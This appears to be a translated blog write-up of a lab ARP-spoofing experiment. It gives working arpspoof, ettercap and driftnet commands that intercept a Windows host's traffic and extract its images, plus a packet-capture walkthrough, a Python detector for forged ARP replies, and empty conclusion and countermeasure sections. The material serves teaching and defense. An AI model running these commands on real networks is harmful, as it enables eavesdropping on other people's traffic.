
ARP spoofing: experiment and analysis

2016-07-07  562 readers  Iam老J

Definition

ARP spoofing, ARP cache poisoning, or ARP poison routing, is a technique by which an attacker sends (spoofed) Address Resolution Protocol (ARP) messages onto a local area network. Generally, the aim is to associate the attacker's MAC address with the IP address of another host, such as the default gateway, causing any traffic meant for that IP address to be sent to the attacker instead. (From Wikipedia)

This breaks down into the following concepts:


Scenario test

Topology

topo4kali_penetration.png

Tools involved

Goal

Use arpspoof or ettercap to carry out an ARP spoofing attack against a Windows host (Win10) on the LAN.

  1. Enable ip_forward on the attacking host (it is off by default). If it is left disabled, the result can be a network-outage attack on the target.
  2. Run arpspoof.
## Spoof in both directions; otherwise only half of the traffic is redirected to the attacker, which causes a DoS
## How to use arpspoof
arpspoof -i <interface> -t <target> <default gateway>
arpspoof -i <interface> -t <default gateway> <target>
## Actual commands run
## Gateway's IP 192.168.168.1
## Victim's IP  192.168.168.101
arpspoof -i eth0 -t 192.168.168.101 192.168.168.1
arpspoof -i eth0 -t 192.168.168.1 192.168.168.101
  3. Use driftnet to extract the images (audio is also possible) carried in the intercepted traffic.
## Capture images from network traffic and display them in an X window.
driftnet -i eth0 -m 200 -a -d ~/Pictures
## -i interface
## -m maximum number of images to store
## -a do not display in an X window, just store the images
## -d directory
  4. (Optional) Use ettercap instead of arpspoof.
ettercap -i eth0 -Tq -M arp:remote //192.168.168.101// //192.168.168.1//
Options:
-i: network interface
-T: text mode (-G for the graphical interface)
-q: quiet mode, only shows output when a password is sniffed
-M: attack method
-P: load a plugin, for example sslstrip

Packet capture analysis

Sniffer (192.168.168.104)-- Win host (192.168.168.101)
------> who is at 101 (request)
<------ win's mac is at 101 (reply)
------> who is at 1 (request)
<------ gw's mac is at 1 (reply)
arpspoof starts
------> gw(Sniffer's mac) is at 1 (reply) ## cheat Win host
------> win(Sniffer's mac) is at 104 (reply) ## cheat Gateway
... repeat above two actions periodically
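
The capture above gives a defender two things to watch for: an ARP reply that nobody asked for, and an IP address (here the gateway's) that suddenly maps to a different MAC. The Python sketch below is an added example, not part of the original post; it parses raw Ethernet/ARP frames and flags both signals. The function names and MAC addresses are assumptions made up for the sample, and the IP addresses are the ones used in this experiment.

```python
import struct

def parse_arp(frame):
    """Return (opcode, sender_mac, sender_ip, target_ip) for an Ethernet/IPv4 ARP frame, else None."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x06":   # EtherType 0x0806 = ARP
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    dotted = lambda raw: ".".join(str(b) for b in raw)
    return op, frame[22:28].hex(":"), dotted(frame[28:32]), dotted(frame[38:42])

def detect_poisoning(frames):
    """Return (frame_no, kind, ip, claimed_mac) alerts; first-seen bindings are trusted (assumption).
    'rebind': a known IP is claimed by a different MAC. 'unsolicited': a reply with no
    matching request seen (weaker signal, gratuitous ARP is legitimate)."""
    bindings, pending, alerts = {}, set(), []
    for no, frame in enumerate(frames, 1):
        parsed = parse_arp(frame)
        if parsed is None:
            continue
        op, mac, ip, target = parsed
        if op == 1:                       # request: remember which IP was asked for
            pending.add(target)
        elif op == 2:                     # reply: was there a request for this IP?
            if ip not in pending:
                alerts.append((no, "unsolicited", ip, mac))
            pending.discard(ip)
        if bindings.setdefault(ip, mac) != mac:
            alerts.append((no, "rebind", ip, mac))
    return alerts

def build(op, src_mac, src_ip, dst_mac, dst_ip):   # helper for the constructed sample only
    mac = lambda s: bytes.fromhex(s.replace(":", ""))
    ip = lambda s: bytes(int(x) for x in s.split("."))
    return (mac(dst_mac) + mac(src_mac) + b"\x08\x06" + struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
            + mac(src_mac) + ip(src_ip) + mac(dst_mac) + ip(dst_ip))

# Constructed capture as seen on the Win host; MACs are made up, IPs are this experiment's.
GW, WIN, SNIFF, BCAST = "02:00:00:00:00:01", "02:00:00:00:00:65", "02:00:00:00:00:68", "ff:ff:ff:ff:ff:ff"
SAMPLE = [
    build(1, WIN, "192.168.168.101", BCAST, "192.168.168.1"),      # who is at 1
    build(2, GW, "192.168.168.1", WIN, "192.168.168.101"),         # gw's mac is at 1
    build(1, SNIFF, "192.168.168.104", BCAST, "192.168.168.101"),  # who is at 101
    build(2, WIN, "192.168.168.101", SNIFF, "192.168.168.104"),    # win's mac is at 101
    build(2, SNIFF, "192.168.168.1", WIN, "192.168.168.101"),      # forged: sniffer's mac is at 1
    build(2, SNIFF, "192.168.168.1", WIN, "192.168.168.101"),      # repeated periodically
]
```

Calling `detect_poisoning(SAMPLE)` raises no alert for the first four frames and reports both signals for each forged reply.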

Conclusion


Countermeasures
